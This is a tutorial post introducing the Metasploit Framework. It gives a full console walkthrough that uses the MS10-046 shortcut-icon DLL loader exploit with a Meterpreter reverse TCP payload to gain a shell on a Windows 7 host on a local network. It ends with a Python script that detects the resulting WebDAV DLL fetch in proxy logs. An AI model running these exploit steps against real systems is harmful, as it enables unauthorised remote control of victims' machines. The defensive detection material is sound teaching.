METASPLOIT FRAMEWORK



ONEPOIN.COM - The Metasploit Framework (MSF) is a framework: a collection of programs and tools for network penetration testing. Metasploit ships with a collection of exploits, payloads, libraries and interfaces that can be used to exploit computers.

Metasploit has a large collection of exploits and payloads, together with tools to package them and deliver them to the targeted host. Metasploit lets you pick an exploit from the library, choose a payload, configure the target address, target port number and other options, and the framework then packages everything together and launches it across the network at the target system. Metasploit is very flexible and can help both with testing and with exploit development. Written in the Ruby programming language, Metasploit also lets users write their own exploits and payloads and add them to the framework. Metasploit is cross-platform: it runs on Linux, Mac OS and Windows, and it has exploits and payloads targeting all three as well.

Meterpreter - One of the more powerful payloads is the Metasploit Interpreter, or Meterpreter. Meterpreter gives the user command-line access to the target machine without running a cmd.exe process; it runs entirely in memory inside the exploited process.



EXAMPLE

Reverse connection from a target running Windows 7:

Bugtraq@Ubuntu:/home/bugtraq$ sudo msfconsole
[sudo] password for bugtraq:
[*] Starting Metasploit Console...

 _                                                    _
/ \    /\         __                         _   __  /_/ __
| |\  / | _____   \ \           ___   _____ | | /  \ _   \ \
| | \/| | | ___\ |- -|   /\    / __\ | -__/ | || | || | |- -|
|_|   | | | _|__  | |_  / -\ __\ \   | |    | | \__/| |  | |_
      |/  |____/  \___\/ /\ \\___/   \/     \__|    |_\  \___\


Love leveraging credentials? Check out bruteforcing

       =[ metasploit v4.10.0-2014082003 [core:4.10.0.pre.2014082003 api:1.0.0]]
+ -- --=[ 1339 exploits - 809 auxiliary - 228 post        ]
+ -- --=[ 340 payloads - 35 encoders - 8 nops             ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]

msf > show exploits

Exploits
========

   Name                                                           Disclosure Date  Rank       Description
   ----                                                           ---------------  ----       -----------
   aix/local/ibstat_path                                          2013-09-24       excellent  ibstat $PATH Privilege Escalation
   aix/rpc_cmsd_opcode21                                          2009-10-07       great      AIX Calendar Manager Service Daemon (rpc.cmsd) Opcode 21 Buffer Overflow
   aix/rpc_ttdbserverd_realpath                                   2009-06-17       great      ToolTalk rpc.ttdbserverd _tt_internal_realpath Buffer Overflow (AIX)
   android/browser/webview_addjavascriptinterface                 2012-12-21       normal     Android Browser and WebView addJavascriptInterface Code Execution
   android/fileformat/adobe_reader_pdf_js_interface               2014-04-13       good       Adobe Reader for Android addJavascriptInterface Exploit
   apple_ios/browser/safari_libtiff                               2006-08-01       good       Apple iOS MobileSafari LibTIFF Buffer Overflow
   apple_ios/email/mobilemail_libtiff                             2006-08-01       good       Apple iOS MobileMail LibTIFF Buffer Overflow
   apple_ios/ssh/cydia_default_ssh                                2007-07-02       excellent  Apple iOS Default SSH Password Vulnerability
   bsdi/softcart/mercantec_softcart                               2004-08-19       great      Mercantec SoftCart CGI Overflow
   dialup/multi/login/manyargs                                    2001-12-12       good       System V Derived /bin/login Extraneous Arguments Buffer Overflow
   firefox/local/exec_shellcode                                   2014-03-10       normal     Firefox Exec Shellcode from Privileged Javascript Shell
   freebsd/ftp/proftp_telnet_iac                                  2010-11-01       great      ProFTPD 1.3.2rc3 - 1.3.3b Telnet IAC Buffer Overflow (FreeBSD)
   freebsd/local/mmap                                             2013-06-18       great      FreeBSD 9 Address Space Manipulation Privilege Escalation
   freebsd/samba/trans2open                                       2003-04-07       great      Samba trans2open Overflow (*BSD x86)
   freebsd/tacacs/xtacacsd_report                                 2008-01-08       average    XTACACSD report() Buffer Overflow
   freebsd/telnet/telnet_encrypt_keyid                            2011-12-23       great      FreeBSD Telnet Service Encryption Key ID Buffer
.............
msf > use windows/browser/ms10_046_shortcut_icon_dllloader


msf exploit(ms10_046_shortcut_icon_dllloader) > show payloads

Compatible Payloads
===================

   Name                                             Disclosure Date  Rank    Description
   ----                                             ---------------  ----    -----------
   generic/custom                                                    normal  Custom Payload
   generic/debug_trap                                                normal  Generic x86 Debug Trap
   generic/shell_bind_tcp                                            normal  Generic Command Shell, Bind TCP Inline
   generic/shell_reverse_tcp                                         normal  Generic Command Shell, Reverse TCP Inline
   generic/tight_loop                                                normal  Generic x86 Tight Loop
   windows/dllinject/bind_ipv6_tcp                                   normal  Reflective DLL Injection, Bind TCP Stager (IPv6)
   windows/dllinject/bind_nonx_tcp                                   normal  Reflective DLL Injection, Bind TCP Stager (No NX or Win7)
   windows/dllinject/bind_tcp                                        normal  Reflective DLL Injection, Bind TCP Stager
   windows/dllinject/bind_tcp_rc4                                    normal  Reflective DLL Injection, Bind TCP Stager (RC4 Stage Encryption)
   windows/dllinject/reverse_hop_http                                normal  Reflective DLL Injection, Reverse Hop HTTP Stager
   windows/dllinject/reverse_http                                    normal  Reflective DLL Injection, Reverse HTTP Stager
   windows/dllinject/reverse_ipv6_tcp                                normal  Reflective DLL Injection, Reverse TCP Stager (IPv6)
   windows/dllinject/reverse_nonx_tcp                                normal  Reflective DLL Injection, Reverse TCP Stager (No NX or Win7)
   windows/dllinject/reverse_ord_tcp                                 normal  Reflective DLL Injection, Reverse Ordinal TCP Stager (No NX or Win7)
   windows/dllinject/reverse_tcp                                     normal  Reflective DLL Injection, Reverse TCP Stager
   windows/dllinject/reverse_tcp_allports                            normal  Reflective DLL Injection, Reverse All-Port TCP Stager
   windows/dllinject/reverse_tcp_dns                                 normal  Reflective DLL Injection, Reverse TCP Stager (DNS)
   windows/dllinject/reverse_tcp_rc4                                 normal  Reflective DLL Injection, Reverse TCP Stager (RC4 Stage Encryption)
   windows/dllinject/reverse_tcp_rc4_dns                             normal  Reflective DLL Injection, Reverse TCP Stage

..................................
msf exploit(ms10_046_shortcut_icon_dllloader) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(ms10_046_shortcut_icon_dllloader) > set LHOST 192.168.1.10
LHOST => 192.168.1.10
msf exploit(ms10_046_shortcut_icon_dllloader) > show options

Module options (exploit/windows/browser/ms10_046_shortcut_icon_dllloader):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SRVHOST  0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT  80               yes       The daemon port to listen on (do not change)
   SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)
   UNCHOST                   no        The host portion of the UNC path to provide to clients (ex: 1.2.3.4).
   URIPATH  /                yes       The URI to use (do not change).


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (accepted: seh, thread, process, none)
   LHOST     192.168.1.10     yes       The listen address
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic


msf exploit(ms10_046_shortcut_icon_dllloader) > set SRVHOST 192.168.1.10
SRVHOST => 192.168.1.10
msf exploit(ms10_046_shortcut_icon_dllloader) > exploit
[*] Exploit running as background job.

[*] Started reverse handler on 192.168.1.10:4444
msf exploit(ms10_046_shortcut_icon_dllloader) > [*] Send vulnerable clients to \\192.168.1.10\nlyZM\.
[*] Or, get clients to save and render the icon of http://<your host>/<anything>.lnk
[*] Using URL: http://192.168.1.10:80/
[*] Server started.
[*] 192.168.1.40     ms10_046_shortcut_icon_dllloader - Sending UNC redirect
[*] 192.168.1.40     ms10_046_shortcut_icon_dllloader - Sending UNC redirect
[*] 192.168.1.40     ms10_046_shortcut_icon_dllloader - Sending UNC redirect
[*] 192.168.1.40     ms10_046_shortcut_icon_dllloader - Responding to WebDAV OPTIONS request
[*] 192.168.1.40     ms10_046_shortcut_icon_dllloader - Received WebDAV PROPFIND request for /nlyZM
[*] 192.168.1.40     ms10_046_shortcut_icon_dllloader - Sending 301 for /nlyZM ...
[*] 192.168.1.40     ms10_046_shortcut_icon_dllloader - Received WebDAV PROPFIND request for /nlyZM/
[*] 192.168.1.40     ms10_046_shortcut_icon_dllloader - Sending directory multistatus for /nlyZM/ ...
[*] 192.168.1.40     ms10_046_shortcut_icon_dllloader - Received WebDAV PROPFIND request for /nlyZM
[*] 192.168.1.40     ms10_046_shortcut_icon_dllloader - Sending 404 for /nlyZM/dEgPpgDCjZL.dll.2.Manifest ...
[*] 192.168.1.40     ms10_046_shortcut_icon_dllloader - Received WebDAV PROPFIND request for /nlyZM
[*] 192.168.1.40     ms10_046_shortcut_icon_dllloader - Sending 301 for /nlyZM ...
[*] 192.168.1.40     ms10_046_shortcut_icon_dllloader - Received WebDAV PROPFIND request for /nlyZM/
[*] 192.168.1.40     ms10_046_shortcut_icon_dllloader - Sending directory multistatus for /nlyZM/ ...
[*] 192.168.1.40     ms10_046_shortcut_icon_dllloader - Received WebDAV PROPFIND request for /nlyZM
[*] 192.168.1.40     ms10_046_shortcut_icon_dllloader - Sending 301 for /nlyZM ...
[*] 192.168.1.40     ms10_046_shortcut_icon_dllloader - Received WebDAV PROPFIND request for /nlyZM/
[*] 192.168.1.40     ms10_046_shortcut_icon_dllloader - Sending directory multistatus for /nlyZM/ ...
[*] Sending stage (769536 bytes) to 192.168.1.40
[*] 192.168.1.40     ms10_046_shortcut_icon_dllloader - Received WebDAV PROPFIND request for /nlyZM/dEgPpgDCjZL.dll
[*] 192.168.1.40     ms10_046_shortcut_icon_dllloader - Sending DLL multistatus for /nlyZM/dEgPpgDCjZL.dll ...
[*] Meterpreter session 1 opened (192.168.1.10:4444 -> 192.168.1.40:52843) at 2015-10-09 16:42:57 +0530

msf exploit(ms10_046_shortcut_icon_dllloader) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > execute -f cmd.exe -i -H
Process 4036 created.
Channel 1 created.
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Windows\system32>ipconfig
ipconfig

Windows IP Configuration

Ethernet adapter Local Area Connection:

   Connection-specific DNS Suffix  . :
   Link-local IPv6 Address . . . . . : fe80::310c:8439:5772:51c8%11
   IPv4 Address. . . . . . . . . . . : 192.168.1.40
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : fe80::226:15ff:fe67:e6c3%11
                                       192.168.1.1
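The console output above shows the client-side pattern this module depends on: the Windows target sends WebDAV OPTIONS and PROPFIND requests to the share and then retrieves a DLL from it. The following detection script is an added example, not part of the original post or of Metasploit; it assumes a hypothetical proxy log format of `timestamp client method url status` (the sample lines are constructed) and flags any client that enumerates a WebDAV directory and then pulls a .dll from inside it.

```python
import re
from collections import defaultdict

# Constructed log lines in an assumed "timestamp client method url status" format.
# The first client replays the request sequence from the console output above;
# the second client is benign WebDAV document access and must not be flagged.
SAMPLE_LOG = """\
2015-10-09T16:42:40 192.168.1.40 OPTIONS http://192.168.1.10/ 200
2015-10-09T16:42:41 192.168.1.40 PROPFIND http://192.168.1.10/nlyZM 301
2015-10-09T16:42:41 192.168.1.40 PROPFIND http://192.168.1.10/nlyZM/ 207
2015-10-09T16:42:42 192.168.1.40 PROPFIND http://192.168.1.10/nlyZM/dEgPpgDCjZL.dll 207
2015-10-09T16:42:50 192.168.1.41 PROPFIND http://intranet.example/docs/ 207
2015-10-09T16:42:51 192.168.1.41 GET http://intranet.example/docs/report.pdf 200
"""

LINE_RE = re.compile(r"^(\S+) (\S+) ([A-Z]+) (\S+) (\d{3})$")
URL_RE = re.compile(r"^https?://([^/]+)(/.*)$")

def parse_line(line):
    """Split one log line into its fields; return None for lines that do not match."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    ts, client, method, url, status = m.groups()
    u = URL_RE.match(url)
    if not u:
        return None
    return {"ts": ts, "client": client, "method": method,
            "host": u.group(1), "path": u.group(2), "status": int(status)}

def find_webdav_dll_loads(lines):
    """Return (client, host, dll_path) for every client that first enumerates a
    WebDAV directory (PROPFIND on a path ending in '/') and then requests a .dll
    inside that directory on the same host, in that order."""
    enumerated = defaultdict(set)   # (client, host) -> directories PROPFINDed so far
    hits = []
    for rec in filter(None, map(parse_line, lines)):
        key = (rec["client"], rec["host"])
        path = rec["path"]
        if rec["method"] == "PROPFIND" and path.endswith("/"):
            enumerated[key].add(path)
        elif path.lower().endswith(".dll") and rec["method"] in ("PROPFIND", "GET"):
            parent = path.rsplit("/", 1)[0] + "/"
            if parent in enumerated[key]:
                hits.append((rec["client"], rec["host"], path))
    return hits

if __name__ == "__main__":
    for client, host, path in find_webdav_dll_loads(SAMPLE_LOG.splitlines()):
        print(f"suspicious WebDAV DLL load: {client} fetched {path} from {host}")
```

A DLL fetched over WebDAV right after a directory listing from the same host is rare in normal traffic, so a hit is worth correlating with an outbound connection from that client to an unusual port, such as the 4444 handler seen above.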

